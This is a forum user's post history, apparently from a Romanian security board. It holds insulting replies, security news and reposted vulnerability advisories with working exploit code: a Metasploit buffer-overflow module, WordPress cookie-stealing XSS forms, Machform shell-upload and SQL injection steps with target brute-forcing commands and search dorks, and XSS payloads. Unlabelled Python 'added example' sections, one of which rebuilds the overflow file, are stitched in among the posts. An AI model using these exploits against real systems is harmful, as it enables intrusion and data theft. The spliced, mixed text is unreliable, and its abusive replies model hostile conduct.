Everything posted by Matt
Posts: 1773 | Days Won: 6
-
Problem with a small program!!! whoever solves it, I WILL REWARD THE PERSON!!!
Matt replied to d4rkm4nx99's topic in Cosul de gunoi
1. Nobody PM'd me to edit the post; I edited it because it was too bad and you looked innocent. 2. You don't know how to create a topic. 3. I don't give a shit about you: you come begging on the forum and post a suspicious archive. If you were a smart kid, right after I posted you would have stayed and explained what and how, but since you're an illiterate who can't even type, there's no way, sir. 4. Die. //Byte-ul: Give him the program, don't show him that you're the same as him. Make a noble gesture and send him the program. Maybe he's learned his lesson. -
Problem with a small program!!! whoever solves it, I WILL REWARD THE PERSON!!!
Matt replied to d4rkm4nx99's topic in Cosul de gunoi
Get lost, you loser, do you think I'll swallow all that from you? I piss on you, lost kids dreaming about programs at night. Go to hell. -
Problem with a small program!!! whoever solves it, I WILL REWARD THE PERSON!!!
Matt replied to d4rkm4nx99's topic in Cosul de gunoi
// But are you all losers? Did you all get screwed by that damn Ghost? This is the third topic created specially for one idiot. Don't you see you're overdoing it?
-
I'd like the M2 maths paper too. I took the baccalaureate 2 years ago, but last night I dreamed I was taking it again. lol ))
-
Description : Linksys versions EA2700, EA3500, E4200, EA4500 using lighttpd 1.4.28 and Utopia on Linux 2.6.22 suffer from an unauthenticated access vulnerability.
Author : Kyle Lovett
Source : Linksys EA2700 / EA3500 / E4200 / EA4500 Unauthenticated Access ≈ Packet Storm

Code :

Vulnerable products: Linksys EA2700, EA3500, E4200, EA4500 using lighttpd 1.4.28 and Utopia on Linux 2.6.22
Firmware Version: 1.0.14 EA2700
Firmware Version: 1.0.30 EA3500
Firmware Version: 2.0.36 E4200
Firmware Version: 2.0.36 EA4500

Impact:
- Major

Timeline:
- Still awaiting word back from Linksys support. Partial disclosure at the present due to the impact; full disclosure in the near future if warranted.

Vulnerabilities:
- Unauthenticated remote access to all pages of the router administration GUI, bypassing any credential prompts under certain common configurations (see below)
- Direct access to several other critical files, unauthenticated as well

Vulnerability conditions seen in all variations:
- Remote Management - Disabled
- UPnP - Enabled
- IPv4 SPI Firewall Protection - Disabled

Although not the same symptoms as the bug that plagues most ASUS routers that are AiCloud enabled with WebDav, the utilization of both UPnP and SSL on lighttpd v1.4.28 appears to be an extremely problematic combination, exposing certain vulnerabilities to the WAN side of the router.

Recommendations:
- Disable UPnP
- Enable at minimum the built-in IPv4 SPI firewall
- Oddly, in some instances, resetting the password and doing a full power-down reboot has been shown to close the vulnerability, but not always
- Disallow remote access from the WAN side - both http and https
- Changing the default user name and password won't help in this case, but it always bears repeating
- Since an attacker has access to enable the FTP service, USB drives mounted in the router should be removed until a patch is out, or the full scope of the issue is known

Testing of additional firmware is ongoing.
-
Malware collaboration is one of the most recent techniques used by cyber attackers to make sure their malware cannot be removed from infected computers, Microsoft has reported. The company's Malware Protection Center (MMPC) found that the Vobfus and Beebone malware families constantly update each other with new variants, to make them more resistant to antivirus products. "Up-to-date antivirus products may detect a variant present on the system; however, newly downloaded variants may not be detected immediately," Hyun Choi wrote in an MMPC blog post. A typical self-updating malware family can be remediated once it is detected, and once removed from the system it can no longer download new versions. However, in the case of Vobfus, even if the malware is detected and remediated, it may previously have downloaded an undetected Beebone, which in turn can download an undetected Vobfus variant, Choi explained. In general, the machine is infected with Vobfus via removable media or mapped drives. Vobfus then contacts its command and control centre to receive instructions for downloading a Beebone onto the same machine. At the same time, Vobfus infects other removable media and mapped drives. In the third stage, Beebone contacts its command and control centre to receive instructions to download updates and Vobfus variants, as well as other malware. Finally, the new Vobfus variant downloads new Beebone variants and, simultaneously, infects removable media and mapped drives. To prevent Vobfus and Beebone from taking control of computers, Microsoft recommends caution when accessing external links and keeping browsers and other software up to date.
Since Vobfus is initially downloaded by Beebone and spreads through removable drives, one possible method of preventing infection with the malware is disabling the autorun feature, Choi said. Source : ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
-
Japan has asked the United States for explanations following reports that it was spied on under the National Security Agency's (NSA) PRISM program. "At present, we are in the process of requesting appropriate confirmation" of the information published on Sunday by the British daily The Guardian, Chief Cabinet Secretary Yoshihide Suga announced on Tuesday, AFP reports. According to documents passed to the newspaper by former American consultant Edward Snowden, Japan was among the 38 "targets" monitored by the NSA, alongside France, Italy and Greece. This information was published by the British press after revelations in the German weekly Der Spiegel, which claimed on Saturday that the NSA had spied on European Union (EU) offices in Brussels and on the EU diplomatic mission in Washington. "I refrain from commenting in detail on our diplomatic dialogue (with Washington), but of course we are very interested in this case," Suga continued. The revelations about an alleged NSA spying program have angered some European countries, especially Germany and France, at a time when the EU and the United States are in theory about to launch major negotiations towards signing a transatlantic free-trade agreement. France cannot "accept this type of behaviour," which must stop "immediately," reacted French President François Hollande, the first head of state to speak out categorically about the suspicions of spying hanging over the Americans. "We already have enough elements to ask for explanations," he added. In Germany, a spokesman for Chancellor Angela Merkel, Steffen Seibert, said the United States will have to "restore trust" with its European allies. "I think a discussion will take place soon" between US President Barack Obama and the Chancellor on this subject, he said.
For their part, Belgium, Greece and Austria have asked Washington for explanations. The reaction of Japan, the main ally of the United States in the region, with which it has signed a defence treaty, seems moderate, given that conservative Prime Minister Shinzo Abe is doing everything to improve bilateral relations, which were slightly damaged over the three years from 2009 to 2012 when the Democratic Party of Japan (DPJ, centre-left) was in power. More than 47,000 American troops are stationed in Japan. Source: Business24.Ro
-
Description : Real Player versions 16.0.2.32 and below suffer from a denial of service vulnerability.
Author : Akshaysinh Vaghela
Source : Real Player 16.0.2.32 Resource Exhaustion ≈ Packet Storm

Code :

Title:
====
Real Player resource exhaustion Vulnerability

Credit:
======
Name: Akshaysinh Vaghela
Company/affiliation: Cyberoam Technologies Private Limited
Website: www.cyberoam.com

CVE:
=====
CVE-2013-3299

Date:
====
2013-04-23

CL-ID:
====
CRD-2013-03

Vendor:
======
Real Networks creates products and services that make it easier for people to access and enjoy digital media on the devices and platforms they choose to use.

Product:
=======
Real Player: The first application that enables people to easily download online video, transfer it to a favorite device and share it with friends via Facebook and Twitter.
Product link: http://in.real.com/?mode=rp

Abstract:
=======
Cyberoam Threat Research Labs discovered a resource exhaustion vulnerability in Real Player <= 16.0.2.32.

Report-Timeline:
============
2013-04-23: Vendor notification
2013-05-23: Vendor's last response
2013-06-03: Notification follow-up date
2013-00-00: Vendor fix/patch
2013-06-04: Public disclosure

Affected Version:
=============
Ver ( <= 16.0.2.32 )

Exploitation-Technique:
===================
Network

Severity Rating:
===================
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C)

Details:
=======
Real Networks Real Player is prone to a resource exhaustion vulnerability. When processing a specially crafted HTML file, Real Player uses a value from the file to control a loop operation. Real Player fails to validate the value before using it, which leads to DoS / crash.

Caveats / Prerequisites:
======================
The attacker needs to entice victims to perform an action in order to exploit this vulnerability.

Proof Of Concept:
================
http://i40.tinypic.com/2mg1gt3.jpg
http://i39.tinypic.com/5phchx.png

POC Exploit code:

<html>
<head>
<script language="JavaScript">
{
    var buffer = '\x41'
    for(i=0; i <= 100 ; ++i)
    {
        buffer+=buffer+buffer
        document.write(buffer);
    }
}
</script>
</head>
</html>

Risk:
=====
The security risk of the resource exhaustion vulnerability is estimated as High.

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, including partial usage, of this file requires authorization from Cyberoam Vulnerability Research Team. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Cyberoam Vulnerability Research Team.

The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS upgrades.

If a vendor fails to respond after five business days, Cyberoam Vulnerability Research Team may issue a public advisory disclosing its findings fifteen business days after the initial contact. If a vendor response is received within the timeframe outlined above, Cyberoam Vulnerability Research Team will allow the vendor 6 months to address the vulnerability with a patch. At the end of the deadline, if a vendor is not responsive or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Vulnerability Research Team will publish a limited advisory to enable the defensive community to protect the user. We believe that by doing so the vendor will understand the responsibility they have to their customers and will react appropriately.

Cyberoam Vulnerability Research Team will make every effort to work with vendors to ensure they understand the technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch a particular security flaw, Cyberoam Vulnerability Research Team will offer to work with that vendor to publicly disclose the flaw with some effective workarounds. Before public disclosure of a vulnerability, Cyberoam Vulnerability Research Team may share technical details of the vulnerability with other security vendors who are in a position to provide a protective response to a broader user base.
-
Description : This Metasploit module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding an .lst, allowing arbitrary code execution with the privileges of the user running the application. This Metasploit module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
Author : Julian Ahrens
Source : ABBS Audio Media Player .LST Buffer Overflow ≈ Packet Storm

Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ABBS Audio Media Player. The
        vulnerability occurs when adding an .lst, allowing arbitrary code execution
        with the privileges of the user running the application. This module has
        been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3
        and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julian Ahrens',                      # Vulnerability discovery and PoC
          'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '75096' ],
          [ 'EDB', '25204' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00\x0a\x0d",
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'    => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
              'Offset' => 4108,
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 30 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
      ], self.class)
  end

  def exploit
    buffer = payload.encoded
    buffer << rand_text(target['Offset'] - (payload.encoded.length))
    buffer << [target.ret].pack('V')

    file_create(buffer)
  end

end
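The module's exploit method shows the file layout but hides it behind Metasploit helpers. The script below is an added example, not the module's code or Julian Ahrens' PoC: it rebuilds the same .lst stand-alone (payload, filler up to offset 4108, then the gadget address 0x00412c91 little-endian, all values taken from the module above), refuses payloads containing the module's bad characters, and includes the cyclic-pattern routine used to measure an offset like 4108 in the first place. The 32 INT3 bytes are a placeholder standing in for payload.encoded, not a working payload; the pattern length 20280 is the usual Metasploit pattern size, an assumption of this example.

```python
import string
import struct

# Values taken from the module above (ABBS Audio Media Player 3.1, amp.exe).
RET = 0x00412c91            # add esp,14 ; pop ; pop ; pop ; ret, inside amp.exe
OFFSET = 4108               # distance from buffer start to the saved return address
BADCHARS = b"\x00\x0a\x0d"  # bytes the .lst parser would mangle

# Stand-in for payload.encoded: INT3 breakpoints, so a debugger stops if
# execution ever reaches the buffer. Placeholder only, not a working payload.
PLACEHOLDER_PAYLOAD = b"\xcc" * 32


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...). Every 4-byte window is unique
    within the first 20280 bytes, so a value seen in EIP maps to one offset.
    This is how an offset such as 4108 is measured before a module is written."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, pattern_len=20280):
    """Map the 32-bit value that landed in EIP back to its offset in the pattern.
    The CPU read it little-endian from the stack, so it is packed the same way."""
    return cyclic_pattern(pattern_len).find(struct.pack("<I", eip_value))


def has_bad_chars(data, badchars=BADCHARS):
    """True if any byte from the module's BadChars list is present in data."""
    return any(b in data for b in badchars)


def build_lst(payload, offset=OFFSET, ret=RET):
    """Same layout as the module's exploit method:
    [payload][filler up to offset][ret, little-endian]."""
    if len(payload) > offset:
        raise ValueError("payload of %d bytes does not fit before offset %d"
                         % (len(payload), offset))
    if has_bad_chars(payload):
        raise ValueError("payload contains a bad character")
    filler = b"A" * (offset - len(payload))  # the module uses rand_text here
    return payload + filler + struct.pack("<I", ret)


if __name__ == "__main__":
    with open("msf.lst", "wb") as fh:
        fh.write(build_lst(PLACEHOLDER_PAYLOAD))
```

Note that the gadget address packs to 91 2c 41 00: it contains a NUL, which is on the bad-character list, and the only reason it is usable is that it sits at the very end of the buffer, where a terminating NUL does no harm.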
-
Description : WordPress versions 3.5.1 and below suffer from multiple cross site scripting vulnerabilities.
Author : MustLive
Source : WordPress 3.5.1 Cross Site Scripting ≈ Packet Storm

Code :

Hello list!

These are Cross-Site Scripting vulnerabilities in WordPress, which I disclosed last week.

At the WordPress 3.5.2 release, WP developers mentioned three holes as "security hardenings" (to decrease their importance and to make it look like there were fewer fixed holes). One of these holes is "Cross-Site Scripting (XSS) when Editing Media". After I checked the media editing functionality, I found that it was not one hole but two holes, and these were persistent XSS.

-------------------------
Affected products:
-------------------------

Vulnerable are WordPress 3.5.1 and previous versions.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

These are persistent XSS vulnerabilities at the page http://site/wp-admin/post.php?post=1&action=edit in the parameters excerpt and content. For the attack it's needed to bypass the protection against CSRF (to receive the token _wpnonce, which can be done using reflected XSS).

WordPress 3.5.1 XSS-1.html

<html>
<head>
<title>WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/wp-admin/post.php" method="post">
<input type="hidden" name="_wpnonce" value="cbad9af0d3">
<input type="hidden" name="user_ID" value="1">
<input type="hidden" name="action" value="editpost">
<input type="hidden" name="post_author" value="1">
<input type="hidden" name="post_type" value="attachment">
<input type="hidden" name="post_ID" value="1">
<input type="hidden" name="excerpt" value="</textarea><script>alert(document.cookie)</script>">
<input type="hidden" name="save" value="Update">
</form>
</body>
</html>

The code will execute just after sending the request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visits to this page.

WordPress 3.5.1 XSS-2.html

<html>
<head>
<title>WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/wp-admin/post.php" method="post">
<input type="hidden" name="_wpnonce" value="cbad9af0d3">
<input type="hidden" name="user_ID" value="1">
<input type="hidden" name="action" value="editpost">
<input type="hidden" name="post_author" value="1">
<input type="hidden" name="post_type" value="attachment">
<input type="hidden" name="post_ID" value="1">
<input type="hidden" name="content" value="</textarea><script>alert(document.cookie)</script>">
<input type="hidden" name="save" value="Update">
</form>
</body>
</html>

The code will execute just after sending the request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visits to this page or the page http://site/page_name/attachment/1/.

------------
Timeline:
------------

2013.06.21 - released WordPress 3.5.2.
2013.06.29 - disclosed at my site (http://websecurity.com.ua/6616/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
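The two forms above hard-code a _wpnonce, which in practice has to be read from the victim's own edit page first (the nonce is tied to the session, which is why MustLive chains a reflected XSS in front). The script below is an added example, not MustLive's exploit or WordPress code: it shows the two halves of that chain, extracting the nonce from a constructed fragment of the edit page and producing the same form-encoded editpost body the forms send, and next to it the sink, a textarea rendered once without and once with HTML escaping, so the difference between the persistent XSS and the 3.5.2 behaviour is visible. The page fragment and the nonce value in it are constructed for the example; only the nonce field's attribute layout follows WordPress.

```python
import html
import re
from urllib.parse import urlencode

# Constructed stand-in for the relevant part of wp-admin/post.php?post=1&action=edit.
# The value is the nonce used in the forms above; the field layout follows
# WordPress's hidden nonce input.
SAMPLE_EDIT_PAGE = """
<form name="post" action="post.php" method="post" id="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="cbad9af0d3" />
<input type="hidden" name="post_ID" id="post_ID" value="1" />
<textarea name="excerpt" id="excerpt"></textarea>
</form>
"""

NONCE_RE = re.compile(r'name="_wpnonce"\s+value="([0-9a-f]+)"')
PAYLOAD = "</textarea><script>alert(document.cookie)</script>"


def extract_wpnonce(page_html):
    """Step 1 of the chain: pull _wpnonce out of the victim's edit page.
    In the real attack this runs in the victim's browser via the reflected XSS,
    because the nonce is bound to the victim's session, not to the attacker's."""
    m = NONCE_RE.search(page_html)
    return m.group(1) if m else None


def build_editpost_body(nonce, field, value, post_id=1):
    """Step 2: the same fields as the auto-submitting forms above, form-encoded."""
    fields = {
        "_wpnonce": nonce,
        "user_ID": "1",
        "action": "editpost",
        "post_author": "1",
        "post_type": "attachment",
        "post_ID": str(post_id),
        field: value,          # "excerpt" or "content"
        "save": "Update",
    }
    return urlencode(fields)


def render_textarea(name, value, escape):
    """The sink. With escape=False the stored value is echoed verbatim into the
    edit form, which is what made the XSS persistent; with escape=True the same
    text is shown to the user but cannot close the textarea element."""
    if escape:
        value = html.escape(value, quote=True)   # < > & " ' become entities
    return '<textarea name="%s">%s</textarea>' % (name, value)


def escapes_textarea(rendered):
    """True if the value managed to leave the textarea element."""
    return rendered.count("</textarea>") > 1 or "<script" in rendered


def display_round_trips(value):
    """The browser decodes the entities, so the user still sees the original text."""
    return html.unescape(html.escape(value, quote=True)) == value
```

The fix is entirely on the rendering side: the stored excerpt may legitimately contain angle brackets, so the correct response is to escape on output rather than to reject on input.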
-
In that topic people talked about the Romanian language. Can't we also talk about geography / computer science / maths in the same place? Do we need another topic? The forum is already starving on nothing but off-topic; if we make a topic for every subject, what do you think, will it end up like Dragusanca?
-
You've got a fucking topic just for the baccalaureate. https://rstforums.com/forum/70453-baaaac.rst I hope you fail!
-
Author : Yashar shahinzadeh
Source : Machform Form Maker 2 - Multiple Vulnerabilities

Code :

###########################################################################################
# Exploit Title: Machform form maker - Multiple Vulnerabilities
# Date: 2013 17 June
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://www.appnitro.com
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2
# Special thanks to: Mormoroth
# Dork1: "Powered by MachForm" id=
# Dork2: formularios/view.php?id=
# Dork3: inurl:machform/view.php?id=
#
# Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar
# Contacts: { http://Twitter.com/YShahinzadeh , http://Twitter.com/Mormoroth }
###########################################################################################

Summary:
========
1. Arbitrary file upload
2. MySQL Injection (Error based) and XSS

1. Arbitrary file upload:
=========================
...
...
if(!empty($uploaded_files)){
    foreach ($uploaded_files as $element_name){
        if(empty($form_review)){
            //move file and check for invalid file
            $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}";

            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id} set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
                do_query($query);
            }
        }else{
            //for form with review enabled, append .tmp suffix to all uploaded files
            //move file and check for invalid file
            $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}.tmp";

            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id}_review set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
                do_query($query);
            }

            if(!empty($uploaded_file_lookup[$element_name])){
                unset($uploaded_file_lookup[$element_name]);
            }
        }
    }
}
...
...

Exploit:

In the beginning, the hacker must aim at view.php, located at the root of the site; observing the lines inside the mentioned file is a big lead to discovering the vulnerability:

$input_array = ap_sanitize_input($_POST);
$submit_result = process_form($input_array);

These two lines have functions leading to both the MySQL injection and the arbitrary file upload vulnerability. I'm not going to audit the code; I'll just illustrate the attack, which starts by applying a brute-force procedure on the ID parameter so as to find a form containing a file upload field. It can be achieved with any program; I just issued a Linux command that helped me find it properly:

seq 1 500 | xargs -I XX -P32 curl -s "http://target/view.php?id=XX" -o XX.out
grep "type=\"file\"" *.out

Afterwards, the HTML element followed by for="(.*)" must be identified; the picture below gives a better idea:
http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg

All that has to be done is uploading a PHP shell and finding its name on the server. The file will be uploaded to the path:
http://target.com/data/form_[ID]/[element name]-[mysql_insert_id()].php

In the URL above, [ID] is gathered in the brute-force phase, [element name] is gathered by viewing the HTML source, and [mysql_insert_id()] should be brute-forced again. Being relatively difficult, I've recorded a clip demonstrating what I've said:
http://y-shahinzadeh.ir/tutorial/machform.rar

2. MySQL Injection (Error based) and XSS:
=========================================
...
...
$input_array = ap_sanitize_input($_POST);
...
...

Exploit (POST to view.php after finding HTML elements):

element_1=1&element_2='&element_3=1&form_id=11&submit=1
element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar
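The PHP above does two things that make the advisory's attack work: it keeps the browser-supplied file name (so a .php upload lands with a .php extension at a path the attacker can predict from form_id, element name and insert id) and it interpolates request values into SQL after escaping only. The code below is an added example, not MachForm's code, written in Python rather than PHP so it can be run here; it shows the hardened form of both: an allow-list on extension plus leading magic bytes, a random server-side file name, and a parameterised insert where the only unbindable parts (table and column identifiers) are validated instead of escaped. The allowed types and the in-memory SQLite table are constructed for the example.

```python
import os
import secrets
import sqlite3

# Allow-list constructed for this example: extension -> magic bytes the
# content must start with. MachForm's code accepts any name and any content.
ALLOWED_TYPES = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}


class UploadRejected(ValueError):
    pass


def check_upload(original_name, head):
    """Validate the browser-supplied name and the first bytes of the content.
    Returns the allow-listed extension or raises UploadRejected."""
    if os.path.basename(original_name.replace("\\", "/")) != original_name:
        raise UploadRejected("path separators in file name")
    ext = original_name.rsplit(".", 1)[-1].lower() if "." in original_name else ""
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension %r not allowed" % ext)
    if not head.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not look like .%s" % ext)
    return ext


def rejected(original_name, head):
    """Convenience wrapper: True if check_upload would refuse this upload."""
    try:
        check_upload(original_name, head)
    except UploadRejected:
        return True
    return False


def storage_path(form_id, element_name, original_name, head):
    """Server-side name for an accepted upload. Nothing from the request reaches
    the path: form_id is forced to int, element_name comes from the form
    definition, and the file name is random, so the predictable
    form_[ID]/[element]-[insert_id]-[name] location from the advisory is gone."""
    ext = check_upload(original_name, head)
    return "form_%d/files/%s-%s.%s" % (int(form_id), element_name,
                                       secrets.token_hex(16), ext)


def _valid_identifier(name):
    return name.replace("_", "").isalnum()


def record_submission(conn, form_id, values):
    """Parameterised replacement for the interpolated 'update ap_form_{$form_id}'
    query. Identifiers cannot be bound, so they are validated; the values travel
    as bound parameters and are never interpolated into the SQL text."""
    table = "ap_form_%d" % int(form_id)      # ValueError on anything non-numeric
    cols = sorted(values)
    for c in cols:
        if not _valid_identifier(c):
            raise ValueError("bad column name %r" % c)
    conn.execute("CREATE TABLE IF NOT EXISTS %s (id INTEGER PRIMARY KEY, %s)"
                 % (table, ", ".join("%s TEXT" % c for c in cols)))
    cur = conn.execute("INSERT INTO %s (%s) VALUES (%s)"
                       % (table, ", ".join(cols), ", ".join("?" for _ in cols)),
                       [values[c] for c in cols])
    return cur.lastrowid


def stored_value(conn, form_id, row_id, column):
    if not _valid_identifier(column):
        raise ValueError("bad column name %r" % column)
    row = conn.execute("SELECT %s FROM ap_form_%d WHERE id = ?"
                       % (column, int(form_id)), (row_id,)).fetchone()
    return row[0] if row else None


def demo_submission(values, form_id=11):
    """Round-trip `values` through an in-memory table and return what was stored."""
    conn = sqlite3.connect(":memory:")
    row_id = record_submission(conn, form_id, values)
    return {c: stored_value(conn, form_id, row_id, c) for c in values}
```

A double extension such as shell.php.jpg with a genuine JPEG header is accepted, but it is stored as a random name ending in .jpg, so the web server never sees the .php part; the random name also removes the brute-forceable insert id from the URL. Storing the data directory outside the document root and serving files through a handler would close the remaining gap, which is outside what this snippet shows.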
-
Description : Ubuntu Security Notice 1894-1 - Timo Sirainen discovered that libcurl incorrectly handled memory when parsing URL encoded strings. An attacker could possibly use this issue to cause libcurl to crash, leading to a denial of service, or execute arbitrary code.
Author : Ubuntu
Source : Ubuntu Security Notice USN-1894-1 ≈ Packet Storm

Code :

============================================================================
Ubuntu Security Notice USN-1894-1
July 02, 2013

curl vulnerability
============================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 13.04
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

libcurl could be made to crash or run programs as your login if it received specially crafted input.

Software Description:
- curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Timo Sirainen discovered that libcurl incorrectly handled memory when parsing URL encoded strings. An attacker could possibly use this issue to cause libcurl to crash, leading to a denial of service, or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 13.04:
  libcurl3        7.29.0-1ubuntu3.1
  libcurl3-gnutls 7.29.0-1ubuntu3.1
  libcurl3-nss    7.29.0-1ubuntu3.1

Ubuntu 12.10:
  libcurl3        7.27.0-1ubuntu1.3
  libcurl3-gnutls 7.27.0-1ubuntu1.3
  libcurl3-nss    7.27.0-1ubuntu1.3

Ubuntu 12.04 LTS:
  libcurl3        7.22.0-3ubuntu4.2
  libcurl3-gnutls 7.22.0-3ubuntu4.2
  libcurl3-nss    7.22.0-3ubuntu4.2

Ubuntu 10.04 LTS:
  libcurl3        7.19.7-1ubuntu1.3
  libcurl3-gnutls 7.19.7-1ubuntu1.3

In general, a standard system update will make all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-1894-1
  CVE-2013-2174

Package Information:
  https://launchpad.net/ubuntu/+source/curl/7.29.0-1ubuntu3.1
  https://launchpad.net/ubuntu/+source/curl/7.27.0-1ubuntu1.3
  https://launchpad.net/ubuntu/+source/curl/7.22.0-3ubuntu4.2
  https://launchpad.net/ubuntu/+source/curl/7.19.7-1ubuntu1.3
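The notice says only that libcurl "incorrectly handled memory when parsing URL encoded strings" and gives no detail on where. The decoder below is an added example, not libcurl's code and not a description of its bug: it shows the one bound a percent-decoder has to check, that two more bytes actually exist after a '%' before they are read as hex digits, and cross-checks its handling of truncated escapes against Python's own urllib decoder. The input cases are constructed for the example.

```python
from urllib.parse import unquote_to_bytes

HEX_DIGITS = b"0123456789abcdefABCDEF"


def percent_decode(data):
    """Decode %XX escapes in a byte string. A '%' that is not followed by two
    hex digits, including one cut off by the end of the input, is copied
    through unchanged. The `i + 2 < n` test is the bound that must hold
    before data[i + 1] and data[i + 2] are read."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        if (data[i] == 0x25 and i + 2 < n
                and data[i + 1] in HEX_DIGITS and data[i + 2] in HEX_DIGITS):
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


# Constructed edge cases: a normal escape, an escaped NUL, and malformed or
# truncated tails, which are the inputs that exercise the bound check.
CASES = [
    b"a%41b",   # -> b"aAb"
    b"x%00y",   # -> b"x\x00y": a decoded NUL must not terminate the output early
    b"100%",    # '%' is the last byte
    b"%4",      # one hex digit, then end of input
    b"%zz",     # non-hex after '%'
    b"%%41",    # first '%' is literal, second one is an escape
    b"",
]


def matches_stdlib(cases=CASES):
    """Cross-check against urllib, which also keeps incomplete escapes literally."""
    return all(percent_decode(c) == unquote_to_bytes(c) for c in cases)
```

Working on bytes rather than str matters for the NUL case: a decoder that hands the result to C string functions afterwards has a second, separate length problem, which is why the function returns an explicit length-carrying bytes object.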
-
Description : XML-Sitemaps.com Sitemap Generator version 6.0 suffers from a cross site scripting vulnerability.
Author : Christy Philip Mathew
Source : XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting ≈ Packet Storm

Code :

# XML-Sitemaps.com Sitemap Generator
# Date: 2nd July 2013
# Author: Christy Philip Mathew (www.offcon.org)
# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/
# Version : 6.0

*XSS Vulnerability*

(a) Configuration > Miscellaneous Settings > Send email notifications: update the email to
    a@a.com"><img src=x onerror=prompt(0);>

(b) Update the URL input box with
    http://site.com"><img src=x onerror=prompt(/XSS/);>

Screenshot attached.

All the best,
*Christy Philip Mathew*
Information Security Researcher
Twitter: @christypriory
-
Description : The Skype for Android application appears to have a bug which permits the Android lockscreen (ie. pattern, PIN, password) to be bypassed relatively easily, if the device is logged into Skype, and the "attacker" is able to call the "victim" on Skype.
Author : Pulser
Source : Skype Android Lockscreen Bypass ≈ Packet Storm

Code :

Tested with Skype version 3.2.0.6673 (released 1st July 2013) on various Android devices (Sony Xperia Z, Samsung Galaxy Note 2, Huawei Premia 4G).

The Skype for Android application appears to have a bug which permits the Android inbuilt lockscreen (ie. pattern, PIN, password) to be bypassed relatively easily, if the device is logged into Skype, and the "attacker" is able to call the "victim" on Skype.

